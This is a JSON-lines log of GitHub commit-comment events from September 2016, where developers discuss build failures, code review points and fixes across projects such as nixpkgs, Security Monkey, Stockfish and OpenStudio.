{"id":"4639212062","type":"CommitCommentEvent","actor":{"login":"jwiegley"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19229156,"position":null,"line":null,"path":null,"commit_id":"8df6e25305292bfca6eca8cf42f6f84c1800806a","created_at":"2016-09-29T18:51:55Z","updated_at":"2016-09-29T18:51:55Z","body":"@peti This upgrade of attoparsec breaks on Darwin (using 8.0.1):\r\n\r\n```\r\nbuilding path(s) ‘/nix/store/91ja3cnazmm2kx3p6c9h5zfppxi3djhs-attoparsec-0.13.1.0’\r\nsetupCompilerEnvironmentPhase\r\nBuild with /nix/store/c4k6vzf6cyrms5z0prydj2f2363qm25k-ghc-7.10.3.\r\nunpacking sources\r\nunpacking source archive /nix/store/qh7r4qr3jqsgnmaa436smkqipkf1xbi9-attoparsec-0.13.1.0.tar.gz\r\nsource root is attoparsec-0.13.1.0\r\nsetting SOURCE_DATE_EPOCH to timestamp 1473956674 of file attoparsec-0.13.1.0/tests/QC/Text/Regressions.hs\r\npatching sources\r\ncompileBuildDriverPhase\r\nsetupCompileFlags: -package-db=/private/var/folders/c1/49wv07ys16jbhh4ry92dc8jm0000gn/T/nix-build-attoparsec-0.13.1.0.drv-0/package.conf.d -j8 -threaded\r\n[1 of 1] Compiling Main             ( Setup.lhs, /private/var/folders/c1/49wv07ys16jbhh4ry92dc8jm0000gn/T/nix-build-attoparsec-0.13.1.0.drv-0/Main.o )\r\nLinking Setup ...\r\nconfiguring\r\nconfigureFlags: --verbose --prefix=/nix/store/91ja3cnazmm2kx3p6c9h5zfppxi3djhs-attoparsec-0.13.1.0 --libdir=$prefix/lib/$compiler --libsubdir=$pkgid --with-gcc=clang --package-db=/private/var/folders/c1/49wv07ys16jbhh4ry92dc8jm0000gn/T/nix-build-attoparsec-0.13.1.0.drv-0/package.conf.d --ghc-option=-optl=-Wl,-headerpad_max_install_names --disable-split-objs --disable-library-profiling --disable-executable-profiling --enable-shared --enable-library-vanilla --enable-executable-dynamic --enable-tests\r\nConfiguring attoparsec-0.13.1.0...\r\nSetup: At least the following dependencies are missing:\r\nfail ==4.9.*, semigroups >=0.16.1 && <0.19\r\nbuilder for ‘/nix/store/na188lszyvqca7jch2r7bz9cksi49dyn-attoparsec-0.13.1.0.drv’ failed with exit code 1\r\n```"}},"created_at":"2016-09-29T18:51:55Z"}
{"id":"4639212960","type":"CommitCommentEvent","actor":{"login":"jdstrand"},"repo":{"name":"snapcore/snap-confine"},"payload":{"comment":{"id":19229162,"position":470,"line":525,"path":"src/mount-support.c","commit_id":"43e47b35a13786aa7a7aabe1a45d78febae49aa9","created_at":"2016-09-29T18:52:04Z","updated_at":"2016-09-29T18:52:04Z","body":"Not necessarily here, but are you thinking this will move to SecurityMounts in udisks2 and removable-media interfaces?"}},"created_at":"2016-09-29T18:52:04Z"}
{"id":"4639217375","type":"CommitCommentEvent","actor":{"login":"jwiegley"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19229177,"position":null,"line":null,"path":null,"commit_id":"8df6e25305292bfca6eca8cf42f6f84c1800806a","created_at":"2016-09-29T18:52:48Z","updated_at":"2016-09-29T18:52:48Z","body":"I think this is 7.10.3 specific.  I'll try to upgrade my dependencies to 8.0.1 as a workaround."}},"created_at":"2016-09-29T18:52:48Z"}
{"id":"4639225799","type":"CommitCommentEvent","actor":{"login":"aofall"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19229197,"position":null,"line":null,"path":null,"commit_id":"026d52fab9728f311b8edabaf8a4b598d207f5a7","created_at":"2016-09-29T18:54:10Z","updated_at":"2016-09-29T18:54:10Z","body":"靠背都出来了😂劲劲你才到台湾一个月啊就变成这样了文明用语啊\r\n以及靠背在胡建的闽南话里直译过来就是类似于苦爸的意思，似乎不适合这么使用啊…"}},"created_at":"2016-09-29T18:54:10Z"}
{"id":"4639227201","type":"CommitCommentEvent","actor":{"login":"igorOo"},"repo":{"name":"CostaRico/yii2-images"},"payload":{"comment":{"id":19229200,"position":null,"line":null,"path":null,"commit_id":"cd21c86ee0e544d17f727ba5139bcd8c8511a8b4","created_at":"2016-09-29T18:54:24Z","updated_at":"2016-09-29T18:54:24Z","body":"Exception 'yii\\base\\UnknownMethodException' with message 'Calling unknown method: m140622_111540_create_image_table::pk()'\r\n\r\nfix:\r\nuse yii\\db\\Schema;\r\n\r\nclass m140622_111540_create_image_table extends \\yii\\db\\Migration\r\n{\r\n    public function up()\r\n    {\r\n        $this->createTable('{{%image}}', [\r\n            'id' => Schema::TYPE_PK,\r\n            'filePath' => $this->string(400)->notNull(),\r\n            'itemId' => $this->integer(),\r\n            'isMain' => $this->boolean(),\r\n            'modelName' => $this->string(150)->notNull(),\r\n            'urlAlias' => $this->string(400)->notNull(),\r\n        ]);\r\n\r\n    }\r\n\r\n    public function down()\r\n    {\r\n        $this->dropTable('{{%image}}');\r\n    }"}},"created_at":"2016-09-29T18:54:24Z"}
{"id":"4639227812","type":"CommitCommentEvent","actor":{"login":"Magisus"},"repo":{"name":"glennsarti/facter"},"payload":{"comment":{"id":19229201,"position":null,"line":null,"path":null,"commit_id":"1a6db3a52ee98cd818ce589abb9be167bb4cbf57","created_at":"2016-09-29T18:54:31Z","updated_at":"2016-09-29T18:54:31Z","body":"We have decided to go with one file per resolver, and all that resolver's facts within that file as JSON. The refactoring from the testing end should be minimal. Do we want to try to get these in as part of https://github.com/puppetlabs/facter/pull/1425, or as a separate ticket/PR?"}},"created_at":"2016-09-29T18:54:31Z"}
{"id":"4639238675","type":"CommitCommentEvent","actor":{"login":"timhemel"},"repo":{"name":"octopus-platform/joern"},"payload":{"comment":{"id":19229224,"position":null,"line":null,"path":null,"commit_id":"b9375e968bff91884eefaa91179f51887f08dabd","created_at":"2016-09-29T18:56:17Z","updated_at":"2016-09-29T18:56:17Z","body":"confusing indeed :)\r\nDo you want to keep using `getKey()` for edges or use the more universal `getId()`?"}},"created_at":"2016-09-29T18:56:17Z"}
{"id":"4639241035","type":"CommitCommentEvent","actor":{"login":"zachmullen"},"repo":{"name":"girder/girder"},"payload":{"comment":{"id":19229228,"position":50,"line":84,"path":"girder/utility/plugin_utilities.py","commit_id":"21425d42e24d5da56d59a41dca9ebbb8e067e16a","created_at":"2016-09-29T18:56:40Z","updated_at":"2016-09-29T18:56:40Z","body":"I don't have strong feelings either way. If we choose to remove that from the info dictionary, I vote we do it on a different PR."}},"created_at":"2016-09-29T18:56:40Z"}
{"id":"4639241232","type":"CommitCommentEvent","actor":{"login":"jwiegley"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19229230,"position":null,"line":null,"path":null,"commit_id":"8df6e25305292bfca6eca8cf42f6f84c1800806a","created_at":"2016-09-29T18:56:42Z","updated_at":"2016-09-29T18:56:42Z","body":"Indeed, that was it.  With 8.0.1 it's fine, but not 7.10.3."}},"created_at":"2016-09-29T18:56:42Z"}
{"id":"4639246204","type":"CommitCommentEvent","actor":{"login":"EpicSteve33"},"repo":{"name":"ImagicalGamer/SurvivalGames"},"payload":{"comment":{"id":19229243,"position":null,"line":null,"path":null,"commit_id":"a76222a0d5ee04e52a4cd1f3afa6782ff2aa9adf","created_at":"2016-09-29T18:57:29Z","updated_at":"2016-09-29T18:57:29Z","body":"Hope it works lol"}},"created_at":"2016-09-29T18:57:29Z"}
{"id":"4639246862","type":"CommitCommentEvent","actor":{"login":"ailsoncgt"},"repo":{"name":"amadeusproject/amadeuslms"},"payload":{"comment":{"id":19229246,"position":null,"line":null,"path":null,"commit_id":"9fc956f4d1285c9177b465e6c9a1edd24c3e4bff","created_at":"2016-09-29T18:57:36Z","updated_at":"2016-09-29T18:57:36Z","body":"okkk @fbormann .\r\né que já tinha feito isso umas 2x e não tinha persistência."}},"created_at":"2016-09-29T18:57:36Z"}
{"id":"4639247320","type":"CommitCommentEvent","actor":{"login":"selltc"},"repo":{"name":"davidker/unisys"},"payload":{"comment":{"id":19229249,"position":null,"line":null,"path":null,"commit_id":"8e96f804e1abeaea218797d787b294e4512b9fdb","created_at":"2016-09-29T18:57:41Z","updated_at":"2016-09-29T18:57:41Z","body":"No need to initialize pmsg_hdr.  In fact, it looks like you can delete it altogether, and just directly use\r\nbus_info->pending_msg_hdr when you do the kzalloc() and memcpy().\r\n\r\nWhenever you kfree(bus_info->pending_msg_hdr), you must also set it to NULL.\r\n\r\nNo need to initialize err.\r\n\r\nGiven that you changed the return value to int, I suspect you intended:\r\n* `return 0` instead of just `return`\r\n* `return err` at the very end of the function\r\n\r\nI don't understand how you can now start using errno values (like -ENOMEM) in the controlvm responses, which is what you are doing by sending your `err` to bus_responder().\r\n\r\nI'm a little hazy on the code in bus_epilog() where it was prepared to handle the case where bus_info->pending_msg_hdr was already allocated.  Perhaps that is bogus, but it doesn't appear as if your new code addresses that.  (But, if it is bogus code in bus_epilog(), that of course is ok.)\r\n"}},"created_at":"2016-09-29T18:57:41Z"}
{"id":"4639247467","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19229250,"position":null,"line":null,"path":null,"commit_id":"1a9714483ac527ec3f65b9c135bae8717851e403","created_at":"2016-09-29T18:57:42Z","updated_at":"2016-09-29T18:57:42Z","body":"input_processor_refactor (mbadams5) - Win64-Windows-7-VisualStudio-12: Build Failed\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a9714483ac527ec3f65b9c135bae8717851e403-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a9714483ac527ec3f65b9c135bae8717851e403-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-50.53%25-red.svg)</a> \n"}},"created_at":"2016-09-29T18:57:42Z"}
{"id":"4639252512","type":"CommitCommentEvent","actor":{"login":"jamesbascle"},"repo":{"name":"Jagged/OneOf"},"payload":{"comment":{"id":19229261,"position":null,"line":null,"path":null,"commit_id":"87f911768765d398d792809edf961af853634a07","created_at":"2016-09-29T18:58:34Z","updated_at":"2016-09-29T18:58:34Z","body":"I would suggest they be called Else, and ElseThrow, to make it clear that it is like a big if/else block.  I like the Default bit since it reads more like a case statement, but DefaultThrow just doesn't read right, and if we went with Else, then there could be some consistency.\r\n\r\nThoughts?"}},"created_at":"2016-09-29T18:58:34Z"}
{"id":"4639253493","type":"CommitCommentEvent","actor":{"login":"ahankinson"},"repo":{"name":"DDMAL/mei-test-set"},"payload":{"comment":{"id":19229263,"position":null,"line":null,"path":null,"commit_id":"a0716f92b622f5e7ea08d21687947b476f9a38c2","created_at":"2016-09-29T18:58:44Z","updated_at":"2016-09-29T18:58:44Z","body":"I just noticed that you didn't also commit the Sibelius file for this one -- could you do that? Don't worry about the images -- I'll take care of that."}},"created_at":"2016-09-29T18:58:44Z"}
{"id":"4639254310","type":"CommitCommentEvent","actor":{"login":"topkecleon"},"repo":{"name":"topkecleon/otouto"},"payload":{"comment":{"id":19229268,"position":null,"line":null,"path":null,"commit_id":"331510694f20b28276f553a0d714c9ed4e3b659d","created_at":"2016-09-29T18:58:52Z","updated_at":"2016-09-29T18:58:52Z","body":"Whoops. Fixed."}},"created_at":"2016-09-29T18:58:52Z"}
{"id":"4639255154","type":"CommitCommentEvent","actor":{"login":"zachmullen"},"repo":{"name":"girder/girder"},"payload":{"comment":{"id":19229270,"position":273,"line":293,"path":"girder/utility/plugin_utilities.py","commit_id":"21425d42e24d5da56d59a41dca9ebbb8e067e16a","created_at":"2016-09-29T18:59:01Z","updated_at":"2016-09-29T18:59:01Z","body":"No, we actually document that it's optional, but strongly recommended."}},"created_at":"2016-09-29T18:59:01Z"}
{"id":"4639259082","type":"CommitCommentEvent","actor":{"login":"zachmullen"},"repo":{"name":"girder/girder"},"payload":{"comment":{"id":19229277,"position":251,"line":271,"path":"girder/utility/plugin_utilities.py","commit_id":"21425d42e24d5da56d59a41dca9ebbb8e067e16a","created_at":"2016-09-29T18:59:43Z","updated_at":"2016-09-29T18:59:43Z","body":"? I don't follow"}},"created_at":"2016-09-29T18:59:43Z"}
{"id":"4639259638","type":"CommitCommentEvent","actor":{"login":"aditisingh"},"repo":{"name":"aditisingh/Superpixels_analysis"},"payload":{"comment":{"id":19229281,"position":null,"line":null,"path":null,"commit_id":"0bb9d687608d7a7c3f6f6b3e3b835571d4de1d6e","created_at":"2016-09-29T18:59:48Z","updated_at":"2016-09-29T18:59:48Z","body":"Oversegmentation"}},"created_at":"2016-09-29T18:59:48Z"}
{"id":"4639261570","type":"CommitCommentEvent","actor":{"login":"monkeysecurity"},"repo":{"name":"Netflix/security_monkey"},"payload":{"comment":{"id":19229282,"position":null,"line":null,"path":null,"commit_id":"0c822025ade1694d4e82625b9cba0fdde40df620","created_at":"2016-09-29T19:00:08Z","updated_at":"2016-09-29T19:00:08Z","body":"@gitshbhts - Hopefully this answers the question:\r\n\r\n1) If the auditor finds an issue that does not have an auditor_setting attached, it will fix it:\r\n\r\n           for issue in item.db_item.issues:\r\n                if not issue.auditor_setting:\r\n                    self._set_auditor_setting_for_issue(issue)\r\n\r\n2) If we determine we need to create an item, create it immediately and we'll add ARN and other fields later.\r\n\r\n              item = Item(tech_id=technology_result.id, region=region, account_id=account_result.id, name=name)\r\n              db.session.add(item)\r\n              db.session.commit()\r\n              db.session.refresh(item)\r\n\r\n3) If the watcher is saving an item, and determines another item has been assigned the same ARN, it will move the ARN to the new item:\r\n\r\n       if arn:\r\n            duplicate_arns = Item.query.filter(Item.arn == arn).all()\r\n            for duplicate_item in duplicate_arns:\r\n                if duplicate_item.id != item.id:\r\n                    duplicate_item.arn = None\r\n                    app.logger.info(\"Moving ARN {arn} from {duplicate} to {item}\".format(\r\n                        arn=arn,\r\n                        duplicate=duplicate_item.name,\r\n                        item=item.name\r\n                    ))\r\n                    db.session.add(duplicate_item)\r\n\r\nThis is possible in situations where someone renames a subnet.  The ARN is the same, and the database enforces that ARNs are unique.  To fix the conflict, we just move the ARN over to the new item.\r\n\r\n4) `slurp()` was being called twice.  I removed the extra call.\r\n\r\n             value = monitor.watcher.slurp()\t\t\r\n              (items, exception_map) = monitor.watcher.slurp()"}},"created_at":"2016-09-29T19:00:08Z"}
{"id":"4639264208","type":"CommitCommentEvent","actor":{"login":"BenFrankel"},"repo":{"name":"BenFrankel/CH-Analysis"},"payload":{"comment":{"id":19229289,"position":null,"line":null,"path":null,"commit_id":"bfad8e289d1d6f186dc5f237aec0c0e194fc5c57","created_at":"2016-09-29T19:00:32Z","updated_at":"2016-09-29T19:00:32Z","body":"If you search through log3 for selectCards, there's a place where the only parameters that appear are \"type: selectCards\" and \"IIU: false\", and that's what I meant by that. I'm thinking maybe that happens when no cards are selected e.g. blind rage with no attack cards."}},"created_at":"2016-09-29T19:00:32Z"}
{"id":"4639264531","type":"CommitCommentEvent","actor":{"login":"kc1116"},"repo":{"name":"kc1116/json-gold"},"payload":{"comment":{"id":19229290,"position":null,"line":null,"path":null,"commit_id":"7714d7ce2de0b5d6f24c5bc128a1cddbf45da36d","created_at":"2016-09-29T19:00:36Z","updated_at":"2016-09-29T19:00:36Z","body":"Yes I am aware of that also, I spoke with Dave Longley the author of the spec and he took a glance at my code for me. He to said we would need to update the normalisation algorithm because it's dated, but other than that the signature code looks fine. I am going to write test for the S2015 function, implement the verification function and test the signatures cross platform to see if thy work with other libraries, then I will implement the URDNA2015"}},"created_at":"2016-09-29T19:00:36Z"}
{"id":"4639265389","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19229292,"position":null,"line":null,"path":null,"commit_id":"24455d236c6c1724cdc29b6c9add2983770513db","created_at":"2016-09-29T19:00:42Z","updated_at":"2016-09-29T19:00:42Z","body":"MakeWebKitWork (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-24455d236c6c1724cdc29b6c9add2983770513db-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-29T19:00:42Z"}
{"id":"4639266417","type":"CommitCommentEvent","actor":{"login":"kc1116"},"repo":{"name":"kc1116/json-gold"},"payload":{"comment":{"id":19229296,"position":null,"line":null,"path":null,"commit_id":"7714d7ce2de0b5d6f24c5bc128a1cddbf45da36d","created_at":"2016-09-29T19:00:52Z","updated_at":"2016-09-29T19:00:52Z","body":"Expects more messages from me in the coming days, thanks for the reply "}},"created_at":"2016-09-29T19:00:52Z"}
{"id":"4639266917","type":"CommitCommentEvent","actor":{"login":"AdnanIqbalKhan"},"repo":{"name":"AdnanIqbalKhan/sort"},"payload":{"comment":{"id":19229299,"position":null,"line":null,"path":null,"commit_id":"eac874163a791058c8a0310dcfb2d4afc0fb1221","created_at":"2016-09-29T19:00:57Z","updated_at":"2016-09-29T19:00:57Z","body":"sorting algos"}},"created_at":"2016-09-29T19:00:57Z"}
{"id":"4639267136","type":"CommitCommentEvent","actor":{"login":"panzergame"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":19229300,"position":14,"line":110,"path":"source/gameengine/Rasterizer/RAS_CubeMap.cpp","commit_id":"015e7e2636223bd6ddc4892f68dfe1ae9b581bcf","created_at":"2016-09-29T19:01:00Z","updated_at":"2016-09-29T19:01:00Z","body":"This modification is for what ?"}},"created_at":"2016-09-29T19:01:00Z"}
{"id":"4639268491","type":"CommitCommentEvent","actor":{"login":"ahwitz"},"repo":{"name":"DDMAL/mei-test-set"},"payload":{"comment":{"id":19229308,"position":null,"line":null,"path":null,"commit_id":"a0716f92b622f5e7ea08d21687947b476f9a38c2","created_at":"2016-09-29T19:01:14Z","updated_at":"2016-09-29T19:01:14Z","body":"https://github.com/DDMAL/mei-test-set/pull/5#issuecomment-220643048 - second paragraph, had asked Marina to do it if you were okay with her using her time on that. I don't have access to a copy of Sibelius here, nor do I know how to do the weirder accidentals in it offhand."}},"created_at":"2016-09-29T19:01:14Z"}
{"id":"4639274062","type":"CommitCommentEvent","actor":{"login":"mkolodny"},"repo":{"name":"danxshap/django-rest-surveys"},"payload":{"comment":{"id":19229316,"position":21,"line":62,"path":"rest_surveys/serializers.py","commit_id":"ff227da56d36db182a574ee3b5805177de2b2bc7","created_at":"2016-09-29T19:02:10Z","updated_at":"2016-09-29T19:02:10Z","body":"Here's the docs for `SerializerMethodField`: http://www.django-rest-framework.org/api-guide/fields/#serializermethodfield"}},"created_at":"2016-09-29T19:02:10Z"}
{"id":"4639274633","type":"CommitCommentEvent","actor":{"login":"ailsoncgt"},"repo":{"name":"amadeusproject/amadeuslms"},"payload":{"comment":{"id":19229320,"position":null,"line":null,"path":null,"commit_id":"3ee9a1e6287652f5c525168d6fa9c197a2d32929","created_at":"2016-09-29T19:02:16Z","updated_at":"2016-09-29T19:02:16Z","body":"ok"}},"created_at":"2016-09-29T19:02:16Z"}
{"id":"4639274714","type":"CommitCommentEvent","actor":{"login":"chandro"},"repo":{"name":"jbonicioli/DNS-Registry"},"payload":{"comment":{"id":19229321,"position":null,"line":null,"path":null,"commit_id":"a3b20053385f232a6c02fb8604130bc195e6acf6","created_at":"2016-09-29T19:02:16Z","updated_at":"2016-09-29T19:02:16Z","body":"Hello, i have a doubt with the script, im getting error when i try to create a nameserver\r\n\r\n» New Nameserver\r\nNameserver Name\r\n\r\n  it says\r\n\r\nPlease check:\r\n\r\nPlease choose a Domain.\r\nThe IP you entered is not valid.\r\nInvalid TLD.\r\n\r\n"}},"created_at":"2016-09-29T19:02:16Z"}
{"id":"4639274877","type":"CommitCommentEvent","actor":{"login":"peti"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19229322,"position":null,"line":null,"path":null,"commit_id":"8df6e25305292bfca6eca8cf42f6f84c1800806a","created_at":"2016-09-29T19:02:18Z","updated_at":"2016-09-29T19:02:18Z","body":"Yes, we are tracking LTS 7.x, which is geared towards GHC 8.x. Older compiler may not work out-of-the-box with that package set."}},"created_at":"2016-09-29T19:02:18Z"}
{"id":"4639276291","type":"CommitCommentEvent","actor":{"login":"Lordnoname"},"repo":{"name":"Werdenfels-Gymnasium/Q11-Content"},"payload":{"comment":{"id":19229325,"position":null,"line":null,"path":null,"commit_id":"2b84ea45e18c532397528f7b5f690816a4092d11","created_at":"2016-09-29T19:02:32Z","updated_at":"2016-09-29T19:02:32Z","body":"@IngolfSchmitt I added a few other useful methods. If it fits to the next lesson and you want me to present and discuss the methods in the lesson, I look forward to that . Unfortunately, the code has no console logs for semantic errors, but nevertheless I included another, for me more common way to filter these errors (I simply returned a boolean or something similar). :)"}},"created_at":"2016-09-29T19:02:32Z"}
{"id":"4639293896","type":"CommitCommentEvent","actor":{"login":"BenFrankel"},"repo":{"name":"BenFrankel/CH-Analysis"},"payload":{"comment":{"id":19229355,"position":null,"line":null,"path":null,"commit_id":"f7a499515d0d6ab365cda78ed38f492784f47a79","created_at":"2016-09-29T19:05:36Z","updated_at":"2016-09-29T19:05:36Z","body":"Naming convention in python is almost always lowercase with _ to separate words. The exception is that class names are in PascalCase."}},"created_at":"2016-09-29T19:05:36Z"}
{"id":"4639298956","type":"CommitCommentEvent","actor":{"login":"gabrielebarbieri"},"repo":{"name":"gabrielebarbieri/SQLTools"},"payload":{"comment":{"id":19229363,"position":17,"line":90,"path":"SQLTools.py","commit_id":"f33ec415fb0adc40fd26c35d89e35bafc8495dd2","created_at":"2016-09-29T19:06:30Z","updated_at":"2016-09-29T19:06:30Z","body":"Ok! And yes, you're right about using the selector as an option! I'll add it"}},"created_at":"2016-09-29T19:06:30Z"}
{"id":"4639300596","type":"CommitCommentEvent","actor":{"login":"joachimprinzbach"},"repo":{"name":"joachimprinzbach/TypescriptAngularSample"},"payload":{"comment":{"id":19229364,"position":null,"line":null,"path":null,"commit_id":"d18feebb5d6fdc0afcd98f42c558478198d3d861","created_at":"2016-09-29T19:06:47Z","updated_at":"2016-09-29T19:06:47Z","body":"Hey David\r\n\r\npasst so für mich. \r\nPunkt 1 ist der wichtigste, aber der ist ja nicht gegeben. Oder meckert der Compiler bei dir, wenn du da noch irgendwelchen Schwachsinn dazu schreibst ;-) "}},"created_at":"2016-09-29T19:06:47Z"}
{"id":"4639304545","type":"CommitCommentEvent","actor":{"login":"kpengboy"},"repo":{"name":"ocf/dns"},"payload":{"comment":{"id":19229370,"position":null,"line":null,"path":null,"commit_id":"c54228d4ebfe0be42002f0ecdee08234b445ec8a","created_at":"2016-09-29T19:07:30Z","updated_at":"2016-09-29T19:07:30Z","body":"This is barely a disaster..."}},"created_at":"2016-09-29T19:07:30Z"}
{"id":"4639305102","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19229372,"position":null,"line":null,"path":null,"commit_id":"afe391571bbefbb53e150f2dd39d13bfb3501fdd","created_at":"2016-09-29T19:07:35Z","updated_at":"2016-09-29T19:07:35Z","body":"Also see [Issue 310: Coverity findings CID 171217-171280: Resource leak (RESOURCE_LEAK)](https://github.com/weidai11/cryptopp/issues/310)."}},"created_at":"2016-09-29T19:07:35Z"}
{"id":"4639309616","type":"CommitCommentEvent","actor":{"login":"dgadelha"},"repo":{"name":"zf5/android_device_asus_ctp-common"},"payload":{"comment":{"id":19229380,"position":null,"line":null,"path":null,"commit_id":"7a3c50f66d386009671c36fde20e57a951ea30d4","created_at":"2016-09-29T19:08:24Z","updated_at":"2016-09-29T19:08:24Z","body":"If you didn't have a bootanimation, you're in OEM logo yet.\r\nAn almost boot is when the processes in bootanimation are almost complete (system loading, directory structure creation, ART stuff, etc), and by the logcats that I've seen, you're stuck at before bootanimation, it can't even initialize the Android base."}},"created_at":"2016-09-29T19:08:24Z"}
{"id":"4639315109","type":"CommitCommentEvent","actor":{"login":"hjacobs"},"repo":{"name":"zalando/expan"},"payload":{"comment":{"id":19229393,"position":24,"line":32,"path":"expan/data/csv_fetcher.py","commit_id":"0a0905fceac87bec2519f6a08a746e8685488dc2","created_at":"2016-09-29T19:09:23Z","updated_at":"2016-09-29T19:09:23Z","body":"`os.path.join` anyone? :smirk: "}},"created_at":"2016-09-29T19:09:23Z"}
{"id":"4639317228","type":"CommitCommentEvent","actor":{"login":"gidili"},"repo":{"name":"openworm/org.geppetto.frontend"},"payload":{"comment":{"id":19229398,"position":7,"line":217,"path":"src/main/webapp/js/tests/casperjs/geppetto-tests.js","commit_id":"a8bae8571e3d5351dd9801b75c43d503c32c94b0","created_at":"2016-09-29T19:09:47Z","updated_at":"2016-09-29T19:09:47Z","body":"@jrmartin great! Mystery solved, I asked because I had never seen that syntax in there and was curious"}},"created_at":"2016-09-29T19:09:47Z"}
{"id":"4639318304","type":"CommitCommentEvent","actor":{"login":"theAsmodai"},"repo":{"name":"shelru/vermillion_hack"},"payload":{"comment":{"id":19229399,"position":5,"line":11,"path":"MiniBase/client.cpp","commit_id":"adbda876bffca85f1c3ba93566fc0e4781df3a40","created_at":"2016-09-29T19:09:59Z","updated_at":"2016-09-29T19:09:59Z","body":"/o"}},"created_at":"2016-09-29T19:09:59Z"}
{"id":"4639318571","type":"CommitCommentEvent","actor":{"login":"mynameiskeo"},"repo":{"name":"steemit-intl/steemit.com"},"payload":{"comment":{"id":19229401,"position":null,"line":null,"path":null,"commit_id":"6c85a80357a23a71b4177bc0afe027ef0b74f15d","created_at":"2016-09-29T19:10:02Z","updated_at":"2016-09-29T19:10:02Z","body":"@f3rnando  how are you mate ? We plan to fork for the japan frontend very soon for a Demo,\r\n\r\nis the code working now ? did you fixed it? last time we tried to run it with @skzap for the FR website,  it didnt work"}},"created_at":"2016-09-29T19:10:02Z"}
{"id":"4639326595","type":"CommitCommentEvent","actor":{"login":"HinTak"},"repo":{"name":"mono/xwt"},"payload":{"comment":{"id":19229422,"position":null,"line":null,"path":null,"commit_id":"c58c6f22fe4346cc4a97b4cca21ca0a721f43927","created_at":"2016-09-29T19:11:28Z","updated_at":"2016-09-29T19:11:28Z","body":"\"Not crash\" is not the same as working correctly... Neither of the two mod's I showed ( https://github.com/mono/xwt/commit/c58c6f22fe4346cc4a97b4cca21ca0a721f43927#commitcomment-19181625 ) crash either. And neither of them are correct.\r\n\r\nI still think the expression `(colorVal is Gdk.Color)` is a bit wrong - it assumes that `Label.StyleGetProperty()` returns a ` Gdk.Color` - that's certainly not obvious from the name (`StyleGetProperty`)  - and that's probably why the upstream code was changed in a a somewhat ad hoc manner.\r\n\r\nHow about some combination of `!null` and something more generic and less specific to the *current* upstream implementation?\r\n"}},"created_at":"2016-09-29T19:11:28Z"}
{"id":"4639335585","type":"CommitCommentEvent","actor":{"login":"duaraghav8"},"repo":{"name":"duaraghav8/solparse"},"payload":{"comment":{"id":19229444,"position":null,"line":null,"path":null,"commit_id":"6e32c792da921b736089a5faad42666940cac029","created_at":"2016-09-29T19:13:06Z","updated_at":"2016-09-29T19:13:06Z","body":"#8 "}},"created_at":"2016-09-29T19:13:06Z"}
{"id":"4639341787","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19229458,"position":null,"line":null,"path":null,"commit_id":"7c69c910891516566da80e9048bbeff824fd3ef2","created_at":"2016-09-29T19:14:15Z","updated_at":"2016-09-29T19:14:15Z","body":"MakeWebKitWork (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c69c910891516566da80e9048bbeff824fd3ef2-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c69c910891516566da80e9048bbeff824fd3ef2-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-29T19:14:15Z"}
{"id":"4639343290","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19229461,"position":null,"line":null,"path":null,"commit_id":"9d02b80b3b20c48c73a4050aca534f46841485e8","created_at":"2016-09-29T19:14:33Z","updated_at":"2016-09-29T19:14:33Z","body":"Another way to look for stonewalls is to add a `supporting`bitboard variable similar to stoppers, phalanx, supported, etc, then do the following during the pawn loop (I give some variants to get various effects):\r\n\r\n````\r\n    supporting = neighbours & pawnAttacksBB[s];\r\n\r\n    ....\r\n\r\n    if (more_than_one(supporting))\r\n       score += StoneWall;\r\n\r\n    // if (more_than_one(supporting & CenterBindMask))\r\n    //   score += StoneWall;\r\n\r\n    // if (more_than_one(supporting))\r\n    //   score += StoneWall[relative_rank(Us,s)];\r\n````\r\n\r\nThis avoids the shifts, the popcount and the multiplication by the rank.\r\n\r\n\r\n"}},"created_at":"2016-09-29T19:14:33Z"}
{"id":"4639348582","type":"CommitCommentEvent","actor":{"login":"cleversonlira"},"repo":{"name":"wenblack/Front-End"},"payload":{"comment":{"id":19229476,"position":null,"line":null,"path":null,"commit_id":"102b9a8e2e157da55f08b42a7f39a20d216b4884","created_at":"2016-09-29T19:15:29Z","updated_at":"2016-09-29T19:15:29Z","body":"Very good Wender, continue learning!"}},"created_at":"2016-09-29T19:15:29Z"}
